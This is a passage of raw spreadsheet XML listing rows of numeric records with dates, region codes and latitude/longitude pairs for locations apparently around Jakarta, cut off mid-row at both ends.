        <v>3171070002</v>
      </c>
      <c r="N3278">
        <v>3171070</v>
      </c>
      <c r="O3278">
        <v>3171</v>
      </c>
      <c r="P3278">
        <v>31</v>
      </c>
      <c r="Q3278" t="s">
        <v>2142</v>
      </c>
      <c r="R3278" t="s">
        <v>121</v>
      </c>
      <c r="S3278" t="s">
        <v>108</v>
      </c>
      <c r="T3278" t="s">
        <v>33</v>
      </c>
      <c r="U3278" s="5">
        <v>10682282</v>
      </c>
      <c r="V3278" s="5" t="s">
        <v>17400</v>
      </c>
      <c r="W3278" s="5">
        <v>-624847</v>
      </c>
      <c r="X3278" t="s">
        <v>21137</v>
      </c>
      <c r="Y3278" t="str">
        <f t="shared" si="51"/>
        <v>-6.24847,106.82282</v>
      </c>
    </row>
    <row r="3279" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3279">
        <v>259435</v>
      </c>
      <c r="B3279" s="1">
        <v>44247</v>
      </c>
      <c r="C3279" s="2">
        <v>8.7256944444444443E-2</v>
      </c>
      <c r="D3279" t="s">
        <v>22</v>
      </c>
      <c r="E3279" t="s">
        <v>23</v>
      </c>
      <c r="F3279" t="s">
        <v>10954</v>
      </c>
      <c r="H3279" t="s">
        <v>26</v>
      </c>
      <c r="I3279" t="s">
        <v>592</v>
      </c>
      <c r="J3279" t="s">
        <v>3135</v>
      </c>
      <c r="L3279" t="s">
        <v>10955</v>
      </c>
      <c r="M3279">
        <v>3671011008</v>
      </c>
      <c r="N3279">
        <v>3671011</v>
      </c>
      <c r="O3279">
        <v>3671</v>
      </c>
      <c r="P3279">
        <v>36</v>
      </c>
      <c r="Q3279" t="s">
        <v>700</v>
      </c>
      <c r="R3279" t="s">
        <v>701</v>
      </c>
      <c r="S3279" t="s">
        <v>201</v>
      </c>
      <c r="T3279" t="s">
        <v>171</v>
      </c>
      <c r="U3279" s="5">
        <v>10672350</v>
      </c>
      <c r="V3279" s="5" t="s">
        <v>17401</v>
      </c>
      <c r="W3279" s="5">
        <v>-622972</v>
      </c>
      <c r="X3279" t="s">
        <v>21138</v>
      </c>
      <c r="Y3279" t="str">
        <f t="shared" si="51"/>
        <v>-6.22972,106.72350</v>
      </c>
    </row>
    <row r="3280" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3280">
        <v>259462</v>
      </c>
      <c r="B3280" s="1">
        <v>44247</v>
      </c>
      <c r="C3280" s="2">
        <v>8.8078703703703701E-2</v>
      </c>
      <c r="D3280" t="s">
        <v>22</v>
      </c>
      <c r="E3280" t="s">
        <v>23</v>
      </c>
      <c r="F3280" t="s">
        <v>10956</v>
      </c>
      <c r="G3280" t="s">
        <v>10957</v>
      </c>
      <c r="H3280" t="s">
        <v>26</v>
      </c>
      <c r="I3280" t="s">
        <v>10958</v>
      </c>
      <c r="J3280" t="s">
        <v>118</v>
      </c>
      <c r="L3280" t="s">
        <v>10959</v>
      </c>
      <c r="M3280">
        <v>3171070001</v>
      </c>
      <c r="N3280">
        <v>3171070</v>
      </c>
      <c r="O3280">
        <v>3171</v>
      </c>
      <c r="P3280">
        <v>31</v>
      </c>
      <c r="Q3280" t="s">
        <v>120</v>
      </c>
      <c r="R3280" t="s">
        <v>121</v>
      </c>
      <c r="S3280" t="s">
        <v>108</v>
      </c>
      <c r="T3280" t="s">
        <v>33</v>
      </c>
      <c r="U3280" s="5">
        <v>10681013</v>
      </c>
      <c r="V3280" s="5" t="s">
        <v>17402</v>
      </c>
      <c r="W3280" s="5">
        <v>-625584</v>
      </c>
      <c r="X3280" t="s">
        <v>21139</v>
      </c>
      <c r="Y3280" t="str">
        <f t="shared" si="51"/>
        <v>-6.25584,106.81013</v>
      </c>
    </row>
    <row r="3281" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3281">
        <v>259463</v>
      </c>
      <c r="B3281" s="1">
        <v>44247</v>
      </c>
      <c r="C3281" s="2">
        <v>8.863425925925926E-2</v>
      </c>
      <c r="D3281" t="s">
        <v>22</v>
      </c>
      <c r="E3281" t="s">
        <v>23</v>
      </c>
      <c r="F3281" t="s">
        <v>10960</v>
      </c>
      <c r="H3281" t="s">
        <v>26</v>
      </c>
      <c r="I3281" t="s">
        <v>1953</v>
      </c>
      <c r="J3281" t="s">
        <v>3135</v>
      </c>
      <c r="L3281" t="s">
        <v>10961</v>
      </c>
      <c r="M3281">
        <v>3671012004</v>
      </c>
      <c r="N3281">
        <v>3671012</v>
      </c>
      <c r="O3281">
        <v>3671</v>
      </c>
      <c r="P3281">
        <v>36</v>
      </c>
      <c r="Q3281" t="s">
        <v>5486</v>
      </c>
      <c r="R3281" t="s">
        <v>760</v>
      </c>
      <c r="S3281" t="s">
        <v>201</v>
      </c>
      <c r="T3281" t="s">
        <v>171</v>
      </c>
      <c r="U3281" s="5">
        <v>10672066</v>
      </c>
      <c r="V3281" s="5" t="s">
        <v>17403</v>
      </c>
      <c r="W3281" s="5">
        <v>-622436</v>
      </c>
      <c r="X3281" t="s">
        <v>21140</v>
      </c>
      <c r="Y3281" t="str">
        <f t="shared" si="51"/>
        <v>-6.22436,106.72066</v>
      </c>
    </row>
    <row r="3282" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3282">
        <v>259464</v>
      </c>
      <c r="B3282" s="1">
        <v>44247</v>
      </c>
      <c r="C3282" s="2">
        <v>9.0405092592592592E-2</v>
      </c>
      <c r="D3282" t="s">
        <v>22</v>
      </c>
      <c r="E3282" t="s">
        <v>23</v>
      </c>
      <c r="F3282" t="s">
        <v>10962</v>
      </c>
      <c r="H3282" t="s">
        <v>26</v>
      </c>
      <c r="I3282" t="s">
        <v>1538</v>
      </c>
      <c r="J3282" t="s">
        <v>9945</v>
      </c>
      <c r="L3282" t="s">
        <v>10963</v>
      </c>
      <c r="M3282">
        <v>3171080002</v>
      </c>
      <c r="N3282">
        <v>3171080</v>
      </c>
      <c r="O3282">
        <v>3171</v>
      </c>
      <c r="P3282">
        <v>31</v>
      </c>
      <c r="Q3282" t="s">
        <v>6986</v>
      </c>
      <c r="R3282" t="s">
        <v>1403</v>
      </c>
      <c r="S3282" t="s">
        <v>108</v>
      </c>
      <c r="T3282" t="s">
        <v>33</v>
      </c>
      <c r="U3282" s="5">
        <v>10685773</v>
      </c>
      <c r="V3282" s="5" t="s">
        <v>17404</v>
      </c>
      <c r="W3282" s="5">
        <v>-626195</v>
      </c>
      <c r="X3282" t="s">
        <v>21141</v>
      </c>
      <c r="Y3282" t="str">
        <f t="shared" si="51"/>
        <v>-6.26195,106.85773</v>
      </c>
    </row>
    <row r="3283" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3283">
        <v>259465</v>
      </c>
      <c r="B3283" s="1">
        <v>44247</v>
      </c>
      <c r="C3283" s="2">
        <v>9.195601851851852E-2</v>
      </c>
      <c r="D3283" t="s">
        <v>22</v>
      </c>
      <c r="E3283" t="s">
        <v>23</v>
      </c>
      <c r="F3283" t="s">
        <v>10964</v>
      </c>
      <c r="G3283" t="s">
        <v>10965</v>
      </c>
      <c r="H3283" t="s">
        <v>26</v>
      </c>
      <c r="I3283" t="s">
        <v>166</v>
      </c>
      <c r="J3283" t="s">
        <v>2627</v>
      </c>
      <c r="L3283" t="s">
        <v>10966</v>
      </c>
      <c r="M3283">
        <v>3275031004</v>
      </c>
      <c r="N3283">
        <v>3275031</v>
      </c>
      <c r="O3283">
        <v>3275</v>
      </c>
      <c r="P3283">
        <v>32</v>
      </c>
      <c r="Q3283" t="s">
        <v>4469</v>
      </c>
      <c r="R3283" t="s">
        <v>574</v>
      </c>
      <c r="S3283" t="s">
        <v>41</v>
      </c>
      <c r="T3283" t="s">
        <v>42</v>
      </c>
      <c r="U3283" s="5">
        <v>10701929</v>
      </c>
      <c r="V3283" s="5" t="s">
        <v>17405</v>
      </c>
      <c r="W3283" s="5">
        <v>-628431</v>
      </c>
      <c r="X3283" t="s">
        <v>21142</v>
      </c>
      <c r="Y3283" t="str">
        <f t="shared" si="51"/>
        <v>-6.28431,107.01929</v>
      </c>
    </row>
    <row r="3284" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3284">
        <v>259466</v>
      </c>
      <c r="B3284" s="1">
        <v>44247</v>
      </c>
      <c r="C3284" s="2">
        <v>9.2256944444444447E-2</v>
      </c>
      <c r="D3284" t="s">
        <v>22</v>
      </c>
      <c r="E3284" t="s">
        <v>23</v>
      </c>
      <c r="F3284" t="s">
        <v>10967</v>
      </c>
      <c r="H3284" t="s">
        <v>26</v>
      </c>
      <c r="I3284" t="s">
        <v>3211</v>
      </c>
      <c r="J3284" t="s">
        <v>10968</v>
      </c>
      <c r="L3284" t="s">
        <v>10969</v>
      </c>
      <c r="M3284">
        <v>3172020001</v>
      </c>
      <c r="N3284">
        <v>3172020</v>
      </c>
      <c r="O3284">
        <v>3172</v>
      </c>
      <c r="P3284">
        <v>31</v>
      </c>
      <c r="Q3284" t="s">
        <v>7796</v>
      </c>
      <c r="R3284" t="s">
        <v>1644</v>
      </c>
      <c r="S3284" t="s">
        <v>49</v>
      </c>
      <c r="T3284" t="s">
        <v>33</v>
      </c>
      <c r="U3284" s="5">
        <v>10686995</v>
      </c>
      <c r="V3284" s="5" t="s">
        <v>17406</v>
      </c>
      <c r="W3284" s="5">
        <v>-635113</v>
      </c>
      <c r="X3284" t="s">
        <v>21143</v>
      </c>
      <c r="Y3284" t="str">
        <f t="shared" si="51"/>
        <v>-6.35113,106.86995</v>
      </c>
    </row>
    <row r="3285" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3285">
        <v>259493</v>
      </c>
      <c r="B3285" s="1">
        <v>44247</v>
      </c>
      <c r="C3285" s="2">
        <v>9.3796296296296308E-2</v>
      </c>
      <c r="D3285" t="s">
        <v>22</v>
      </c>
      <c r="E3285" t="s">
        <v>23</v>
      </c>
      <c r="F3285" t="s">
        <v>10970</v>
      </c>
      <c r="H3285" t="s">
        <v>26</v>
      </c>
      <c r="I3285" t="s">
        <v>1665</v>
      </c>
      <c r="J3285" t="s">
        <v>793</v>
      </c>
      <c r="L3285" t="s">
        <v>10971</v>
      </c>
      <c r="M3285">
        <v>3175010002</v>
      </c>
      <c r="N3285">
        <v>3175010</v>
      </c>
      <c r="O3285">
        <v>3175</v>
      </c>
      <c r="P3285">
        <v>31</v>
      </c>
      <c r="Q3285" t="s">
        <v>616</v>
      </c>
      <c r="R3285" t="s">
        <v>546</v>
      </c>
      <c r="S3285" t="s">
        <v>547</v>
      </c>
      <c r="T3285" t="s">
        <v>33</v>
      </c>
      <c r="U3285" s="5">
        <v>10677335</v>
      </c>
      <c r="V3285" s="5" t="s">
        <v>17407</v>
      </c>
      <c r="W3285" s="5">
        <v>-613831</v>
      </c>
      <c r="X3285" t="s">
        <v>21144</v>
      </c>
      <c r="Y3285" t="str">
        <f t="shared" si="51"/>
        <v>-6.13831,106.77335</v>
      </c>
    </row>
    <row r="3286" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3286">
        <v>259520</v>
      </c>
      <c r="B3286" s="1">
        <v>44247</v>
      </c>
      <c r="C3286" s="2">
        <v>9.4907407407407399E-2</v>
      </c>
      <c r="D3286" t="s">
        <v>22</v>
      </c>
      <c r="E3286" t="s">
        <v>23</v>
      </c>
      <c r="F3286" t="s">
        <v>10972</v>
      </c>
      <c r="H3286" t="s">
        <v>26</v>
      </c>
      <c r="I3286" t="s">
        <v>3275</v>
      </c>
      <c r="J3286" t="s">
        <v>4906</v>
      </c>
      <c r="L3286" t="s">
        <v>10973</v>
      </c>
      <c r="M3286">
        <v>3173010002</v>
      </c>
      <c r="N3286">
        <v>3173010</v>
      </c>
      <c r="O3286">
        <v>3173</v>
      </c>
      <c r="P3286">
        <v>31</v>
      </c>
      <c r="Q3286" t="s">
        <v>4908</v>
      </c>
      <c r="R3286" t="s">
        <v>1481</v>
      </c>
      <c r="S3286" t="s">
        <v>62</v>
      </c>
      <c r="T3286" t="s">
        <v>33</v>
      </c>
      <c r="U3286" s="5">
        <v>10681227</v>
      </c>
      <c r="V3286" s="5" t="s">
        <v>17408</v>
      </c>
      <c r="W3286" s="5">
        <v>-621158</v>
      </c>
      <c r="X3286" t="s">
        <v>21145</v>
      </c>
      <c r="Y3286" t="str">
        <f t="shared" si="51"/>
        <v>-6.21158,106.81227</v>
      </c>
    </row>
    <row r="3287" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3287">
        <v>259521</v>
      </c>
      <c r="B3287" s="1">
        <v>44247</v>
      </c>
      <c r="C3287" s="2">
        <v>9.5115740740740737E-2</v>
      </c>
      <c r="D3287" t="s">
        <v>22</v>
      </c>
      <c r="E3287" t="s">
        <v>23</v>
      </c>
      <c r="F3287" t="s">
        <v>10974</v>
      </c>
      <c r="G3287" t="s">
        <v>10975</v>
      </c>
      <c r="H3287" t="s">
        <v>26</v>
      </c>
      <c r="I3287" t="s">
        <v>386</v>
      </c>
      <c r="J3287" t="s">
        <v>2627</v>
      </c>
      <c r="L3287" t="s">
        <v>250</v>
      </c>
      <c r="M3287">
        <v>3216010008</v>
      </c>
      <c r="N3287">
        <v>3216010</v>
      </c>
      <c r="O3287">
        <v>3216</v>
      </c>
      <c r="P3287">
        <v>32</v>
      </c>
      <c r="Q3287" t="s">
        <v>1255</v>
      </c>
      <c r="R3287" t="s">
        <v>1256</v>
      </c>
      <c r="S3287" t="s">
        <v>41</v>
      </c>
      <c r="T3287" t="s">
        <v>42</v>
      </c>
      <c r="U3287" s="5">
        <v>10704134</v>
      </c>
      <c r="V3287" s="5" t="s">
        <v>17409</v>
      </c>
      <c r="W3287" s="5">
        <v>-633970</v>
      </c>
      <c r="X3287" t="s">
        <v>21146</v>
      </c>
      <c r="Y3287" t="str">
        <f t="shared" si="51"/>
        <v>-6.33970,107.04134</v>
      </c>
    </row>
    <row r="3288" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3288">
        <v>259522</v>
      </c>
      <c r="B3288" s="1">
        <v>44247</v>
      </c>
      <c r="C3288" s="2">
        <v>9.5902777777777781E-2</v>
      </c>
      <c r="D3288" t="s">
        <v>22</v>
      </c>
      <c r="E3288" t="s">
        <v>23</v>
      </c>
      <c r="F3288" t="s">
        <v>10976</v>
      </c>
      <c r="H3288" t="s">
        <v>26</v>
      </c>
      <c r="I3288" t="s">
        <v>1633</v>
      </c>
      <c r="J3288" t="s">
        <v>2627</v>
      </c>
      <c r="L3288" t="s">
        <v>10977</v>
      </c>
      <c r="M3288">
        <v>3275050001</v>
      </c>
      <c r="N3288">
        <v>3275050</v>
      </c>
      <c r="O3288">
        <v>3275</v>
      </c>
      <c r="P3288">
        <v>32</v>
      </c>
      <c r="Q3288" t="s">
        <v>4376</v>
      </c>
      <c r="R3288" t="s">
        <v>955</v>
      </c>
      <c r="S3288" t="s">
        <v>41</v>
      </c>
      <c r="T3288" t="s">
        <v>42</v>
      </c>
      <c r="U3288" s="5">
        <v>10696276</v>
      </c>
      <c r="V3288" s="5" t="s">
        <v>17410</v>
      </c>
      <c r="W3288" s="5">
        <v>-625875</v>
      </c>
      <c r="X3288" t="s">
        <v>21147</v>
      </c>
      <c r="Y3288" t="str">
        <f t="shared" si="51"/>
        <v>-6.25875,106.96276</v>
      </c>
    </row>
    <row r="3289" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3289">
        <v>259523</v>
      </c>
      <c r="B3289" s="1">
        <v>44247</v>
      </c>
      <c r="C3289" s="2">
        <v>9.633101851851851E-2</v>
      </c>
      <c r="D3289" t="s">
        <v>22</v>
      </c>
      <c r="E3289" t="s">
        <v>23</v>
      </c>
      <c r="F3289" t="s">
        <v>10978</v>
      </c>
      <c r="G3289" t="s">
        <v>10979</v>
      </c>
      <c r="H3289" t="s">
        <v>26</v>
      </c>
      <c r="I3289" t="s">
        <v>27</v>
      </c>
      <c r="J3289" t="s">
        <v>2627</v>
      </c>
      <c r="M3289">
        <v>3275060002</v>
      </c>
      <c r="N3289">
        <v>3275060</v>
      </c>
      <c r="O3289">
        <v>3275</v>
      </c>
      <c r="P3289">
        <v>32</v>
      </c>
      <c r="Q3289" t="s">
        <v>113</v>
      </c>
      <c r="R3289" t="s">
        <v>114</v>
      </c>
      <c r="S3289" t="s">
        <v>41</v>
      </c>
      <c r="T3289" t="s">
        <v>42</v>
      </c>
      <c r="U3289" s="5">
        <v>10695260</v>
      </c>
      <c r="V3289" s="5" t="s">
        <v>17411</v>
      </c>
      <c r="W3289" s="5">
        <v>-623056</v>
      </c>
      <c r="X3289" t="s">
        <v>21148</v>
      </c>
      <c r="Y3289" t="str">
        <f t="shared" si="51"/>
        <v>-6.23056,106.95260</v>
      </c>
    </row>
    <row r="3290" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3290">
        <v>259524</v>
      </c>
      <c r="B3290" s="1">
        <v>44247</v>
      </c>
      <c r="C3290" s="2">
        <v>9.7581018518518525E-2</v>
      </c>
      <c r="D3290" t="s">
        <v>22</v>
      </c>
      <c r="E3290" t="s">
        <v>23</v>
      </c>
      <c r="F3290" t="s">
        <v>10980</v>
      </c>
      <c r="H3290" t="s">
        <v>26</v>
      </c>
      <c r="I3290" t="s">
        <v>383</v>
      </c>
      <c r="J3290" t="s">
        <v>5559</v>
      </c>
      <c r="L3290" t="s">
        <v>10981</v>
      </c>
      <c r="M3290">
        <v>3172010005</v>
      </c>
      <c r="N3290">
        <v>3172010</v>
      </c>
      <c r="O3290">
        <v>3172</v>
      </c>
      <c r="P3290">
        <v>31</v>
      </c>
      <c r="Q3290" t="s">
        <v>5561</v>
      </c>
      <c r="R3290" t="s">
        <v>5562</v>
      </c>
      <c r="S3290" t="s">
        <v>49</v>
      </c>
      <c r="T3290" t="s">
        <v>33</v>
      </c>
      <c r="U3290" s="5">
        <v>10685808</v>
      </c>
      <c r="V3290" s="5" t="s">
        <v>17412</v>
      </c>
      <c r="W3290" s="5">
        <v>-629769</v>
      </c>
      <c r="X3290" t="s">
        <v>21149</v>
      </c>
      <c r="Y3290" t="str">
        <f t="shared" si="51"/>
        <v>-6.29769,106.85808</v>
      </c>
    </row>
    <row r="3291" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3291">
        <v>259551</v>
      </c>
      <c r="B3291" s="1">
        <v>44247</v>
      </c>
      <c r="C3291" s="2">
        <v>9.9340277777777777E-2</v>
      </c>
      <c r="D3291" t="s">
        <v>22</v>
      </c>
      <c r="E3291" t="s">
        <v>23</v>
      </c>
      <c r="F3291" t="s">
        <v>10982</v>
      </c>
      <c r="H3291" t="s">
        <v>26</v>
      </c>
      <c r="I3291" t="s">
        <v>624</v>
      </c>
      <c r="J3291" t="s">
        <v>5831</v>
      </c>
      <c r="L3291" t="s">
        <v>10983</v>
      </c>
      <c r="M3291">
        <v>3171070001</v>
      </c>
      <c r="N3291">
        <v>3171070</v>
      </c>
      <c r="O3291">
        <v>3171</v>
      </c>
      <c r="P3291">
        <v>31</v>
      </c>
      <c r="Q3291" t="s">
        <v>120</v>
      </c>
      <c r="R3291" t="s">
        <v>121</v>
      </c>
      <c r="S3291" t="s">
        <v>108</v>
      </c>
      <c r="T3291" t="s">
        <v>33</v>
      </c>
      <c r="U3291" s="5">
        <v>10681481</v>
      </c>
      <c r="V3291" s="5" t="s">
        <v>17413</v>
      </c>
      <c r="W3291" s="5">
        <v>-626870</v>
      </c>
      <c r="X3291" t="s">
        <v>21150</v>
      </c>
      <c r="Y3291" t="str">
        <f t="shared" si="51"/>
        <v>-6.26870,106.81481</v>
      </c>
    </row>
    <row r="3292" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3292">
        <v>259552</v>
      </c>
      <c r="B3292" s="1">
        <v>44247</v>
      </c>
      <c r="C3292" s="2">
        <v>0.10002314814814815</v>
      </c>
      <c r="D3292" t="s">
        <v>22</v>
      </c>
      <c r="E3292" t="s">
        <v>23</v>
      </c>
      <c r="F3292" t="s">
        <v>10984</v>
      </c>
      <c r="H3292" t="s">
        <v>26</v>
      </c>
      <c r="I3292" t="s">
        <v>271</v>
      </c>
      <c r="J3292" t="s">
        <v>9767</v>
      </c>
      <c r="L3292" t="s">
        <v>10985</v>
      </c>
      <c r="M3292">
        <v>3174070002</v>
      </c>
      <c r="N3292">
        <v>3174070</v>
      </c>
      <c r="O3292">
        <v>3174</v>
      </c>
      <c r="P3292">
        <v>31</v>
      </c>
      <c r="Q3292" t="s">
        <v>621</v>
      </c>
      <c r="R3292" t="s">
        <v>84</v>
      </c>
      <c r="S3292" t="s">
        <v>32</v>
      </c>
      <c r="T3292" t="s">
        <v>33</v>
      </c>
      <c r="U3292" s="5">
        <v>10672865</v>
      </c>
      <c r="V3292" s="5" t="s">
        <v>17414</v>
      </c>
      <c r="W3292" s="5">
        <v>-616010</v>
      </c>
      <c r="X3292" t="s">
        <v>21151</v>
      </c>
      <c r="Y3292" t="str">
        <f t="shared" si="51"/>
        <v>-6.16010,106.72865</v>
      </c>
    </row>
    <row r="3293" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3293">
        <v>259579</v>
      </c>
      <c r="B3293" s="1">
        <v>44247</v>
      </c>
      <c r="C3293" s="2">
        <v>0.10251157407407407</v>
      </c>
      <c r="D3293" t="s">
        <v>22</v>
      </c>
      <c r="E3293" t="s">
        <v>23</v>
      </c>
      <c r="F3293" t="s">
        <v>10986</v>
      </c>
      <c r="H3293" t="s">
        <v>26</v>
      </c>
      <c r="I3293" t="s">
        <v>3835</v>
      </c>
      <c r="J3293" t="s">
        <v>10616</v>
      </c>
      <c r="L3293" t="s">
        <v>10987</v>
      </c>
      <c r="M3293">
        <v>3171020002</v>
      </c>
      <c r="N3293">
        <v>3171020</v>
      </c>
      <c r="O3293">
        <v>3171</v>
      </c>
      <c r="P3293">
        <v>31</v>
      </c>
      <c r="Q3293" t="s">
        <v>1172</v>
      </c>
      <c r="R3293" t="s">
        <v>484</v>
      </c>
      <c r="S3293" t="s">
        <v>108</v>
      </c>
      <c r="T3293" t="s">
        <v>33</v>
      </c>
      <c r="U3293" s="5">
        <v>10681953</v>
      </c>
      <c r="V3293" s="5" t="s">
        <v>17415</v>
      </c>
      <c r="W3293" s="5">
        <v>-629206</v>
      </c>
      <c r="X3293" t="s">
        <v>21152</v>
      </c>
      <c r="Y3293" t="str">
        <f t="shared" si="51"/>
        <v>-6.29206,106.81953</v>
      </c>
    </row>
    <row r="3294" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3294">
        <v>259580</v>
      </c>
      <c r="B3294" s="1">
        <v>44247</v>
      </c>
      <c r="C3294" s="2">
        <v>0.10266203703703704</v>
      </c>
      <c r="D3294" t="s">
        <v>22</v>
      </c>
      <c r="E3294" t="s">
        <v>23</v>
      </c>
      <c r="F3294" t="s">
        <v>10988</v>
      </c>
      <c r="H3294" t="s">
        <v>26</v>
      </c>
      <c r="I3294" t="s">
        <v>166</v>
      </c>
      <c r="J3294" t="s">
        <v>9767</v>
      </c>
      <c r="L3294" t="s">
        <v>10989</v>
      </c>
      <c r="M3294">
        <v>3174070002</v>
      </c>
      <c r="N3294">
        <v>3174070</v>
      </c>
      <c r="O3294">
        <v>3174</v>
      </c>
      <c r="P3294">
        <v>31</v>
      </c>
      <c r="Q3294" t="s">
        <v>621</v>
      </c>
      <c r="R3294" t="s">
        <v>84</v>
      </c>
      <c r="S3294" t="s">
        <v>32</v>
      </c>
      <c r="T3294" t="s">
        <v>33</v>
      </c>
      <c r="U3294" s="5">
        <v>10672882</v>
      </c>
      <c r="V3294" s="5" t="s">
        <v>17416</v>
      </c>
      <c r="W3294" s="5">
        <v>-616001</v>
      </c>
      <c r="X3294" t="s">
        <v>19417</v>
      </c>
      <c r="Y3294" t="str">
        <f t="shared" si="51"/>
        <v>-6.16001,106.72882</v>
      </c>
    </row>
    <row r="3295" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3295">
        <v>259581</v>
      </c>
      <c r="B3295" s="1">
        <v>44247</v>
      </c>
      <c r="C3295" s="2">
        <v>0.10434027777777777</v>
      </c>
      <c r="D3295" t="s">
        <v>22</v>
      </c>
      <c r="E3295" t="s">
        <v>23</v>
      </c>
      <c r="F3295" t="s">
        <v>10990</v>
      </c>
      <c r="G3295" t="s">
        <v>10991</v>
      </c>
      <c r="H3295" t="s">
        <v>26</v>
      </c>
      <c r="I3295" t="s">
        <v>1046</v>
      </c>
      <c r="J3295" t="s">
        <v>2627</v>
      </c>
      <c r="M3295">
        <v>3216061005</v>
      </c>
      <c r="N3295">
        <v>3216061</v>
      </c>
      <c r="O3295">
        <v>3216</v>
      </c>
      <c r="P3295">
        <v>32</v>
      </c>
      <c r="Q3295" t="s">
        <v>10898</v>
      </c>
      <c r="R3295" t="s">
        <v>55</v>
      </c>
      <c r="S3295" t="s">
        <v>41</v>
      </c>
      <c r="T3295" t="s">
        <v>42</v>
      </c>
      <c r="U3295" s="5">
        <v>10717400</v>
      </c>
      <c r="V3295" s="5" t="s">
        <v>17417</v>
      </c>
      <c r="W3295" s="5">
        <v>-628398</v>
      </c>
      <c r="X3295" t="s">
        <v>21153</v>
      </c>
      <c r="Y3295" t="str">
        <f t="shared" si="51"/>
        <v>-6.28398,107.17400</v>
      </c>
    </row>
    <row r="3296" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3296">
        <v>259582</v>
      </c>
      <c r="B3296" s="1">
        <v>44247</v>
      </c>
      <c r="C3296" s="2">
        <v>0.10509259259259258</v>
      </c>
      <c r="D3296" t="s">
        <v>22</v>
      </c>
      <c r="E3296" t="s">
        <v>23</v>
      </c>
      <c r="F3296" t="s">
        <v>10992</v>
      </c>
      <c r="G3296" t="s">
        <v>10993</v>
      </c>
      <c r="H3296" t="s">
        <v>26</v>
      </c>
      <c r="I3296" t="s">
        <v>10994</v>
      </c>
      <c r="J3296" t="s">
        <v>10995</v>
      </c>
      <c r="M3296">
        <v>3171020003</v>
      </c>
      <c r="N3296">
        <v>3171020</v>
      </c>
      <c r="O3296">
        <v>3171</v>
      </c>
      <c r="P3296">
        <v>31</v>
      </c>
      <c r="Q3296" t="s">
        <v>7783</v>
      </c>
      <c r="R3296" t="s">
        <v>484</v>
      </c>
      <c r="S3296" t="s">
        <v>108</v>
      </c>
      <c r="T3296" t="s">
        <v>33</v>
      </c>
      <c r="U3296" s="5">
        <v>10683487</v>
      </c>
      <c r="V3296" s="5" t="s">
        <v>17418</v>
      </c>
      <c r="W3296" s="5">
        <v>-630912</v>
      </c>
      <c r="X3296" t="s">
        <v>21154</v>
      </c>
      <c r="Y3296" t="str">
        <f t="shared" si="51"/>
        <v>-6.30912,106.83487</v>
      </c>
    </row>
    <row r="3297" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3297">
        <v>259609</v>
      </c>
      <c r="B3297" s="1">
        <v>44247</v>
      </c>
      <c r="C3297" s="2">
        <v>0.10531249999999999</v>
      </c>
      <c r="D3297" t="s">
        <v>22</v>
      </c>
      <c r="E3297" t="s">
        <v>23</v>
      </c>
      <c r="F3297" t="s">
        <v>10996</v>
      </c>
      <c r="G3297" t="s">
        <v>10997</v>
      </c>
      <c r="H3297" t="s">
        <v>26</v>
      </c>
      <c r="I3297" t="s">
        <v>1710</v>
      </c>
      <c r="J3297" t="s">
        <v>3135</v>
      </c>
      <c r="L3297" t="s">
        <v>10998</v>
      </c>
      <c r="M3297">
        <v>3671020016</v>
      </c>
      <c r="N3297">
        <v>3671020</v>
      </c>
      <c r="O3297">
        <v>3671</v>
      </c>
      <c r="P3297">
        <v>36</v>
      </c>
      <c r="Q3297" t="s">
        <v>823</v>
      </c>
      <c r="R3297" t="s">
        <v>274</v>
      </c>
      <c r="S3297" t="s">
        <v>201</v>
      </c>
      <c r="T3297" t="s">
        <v>171</v>
      </c>
      <c r="U3297" s="5">
        <v>10671581</v>
      </c>
      <c r="V3297" s="5" t="s">
        <v>17419</v>
      </c>
      <c r="W3297" s="5">
        <v>-618711</v>
      </c>
      <c r="X3297" t="s">
        <v>21155</v>
      </c>
      <c r="Y3297" t="str">
        <f t="shared" si="51"/>
        <v>-6.18711,106.71581</v>
      </c>
    </row>
    <row r="3298" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3298">
        <v>259610</v>
      </c>
      <c r="B3298" s="1">
        <v>44247</v>
      </c>
      <c r="C3298" s="2">
        <v>0.10583333333333333</v>
      </c>
      <c r="D3298" t="s">
        <v>22</v>
      </c>
      <c r="E3298" t="s">
        <v>23</v>
      </c>
      <c r="F3298" t="s">
        <v>10999</v>
      </c>
      <c r="G3298" t="s">
        <v>11000</v>
      </c>
      <c r="H3298" t="s">
        <v>26</v>
      </c>
      <c r="I3298" t="s">
        <v>1194</v>
      </c>
      <c r="J3298" t="s">
        <v>2627</v>
      </c>
      <c r="L3298" t="s">
        <v>11001</v>
      </c>
      <c r="M3298">
        <v>3215031006</v>
      </c>
      <c r="N3298">
        <v>3215031</v>
      </c>
      <c r="O3298">
        <v>3215</v>
      </c>
      <c r="P3298">
        <v>32</v>
      </c>
      <c r="Q3298" t="s">
        <v>11002</v>
      </c>
      <c r="R3298" t="s">
        <v>11003</v>
      </c>
      <c r="S3298" t="s">
        <v>3979</v>
      </c>
      <c r="T3298" t="s">
        <v>42</v>
      </c>
      <c r="U3298" s="5">
        <v>10728472</v>
      </c>
      <c r="V3298" s="5" t="s">
        <v>17420</v>
      </c>
      <c r="W3298" s="5">
        <v>-632655</v>
      </c>
      <c r="X3298" t="s">
        <v>21156</v>
      </c>
      <c r="Y3298" t="str">
        <f t="shared" si="51"/>
        <v>-6.32655,107.28472</v>
      </c>
    </row>
    <row r="3299" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3299">
        <v>259611</v>
      </c>
      <c r="B3299" s="1">
        <v>44247</v>
      </c>
      <c r="C3299" s="2">
        <v>0.10606481481481482</v>
      </c>
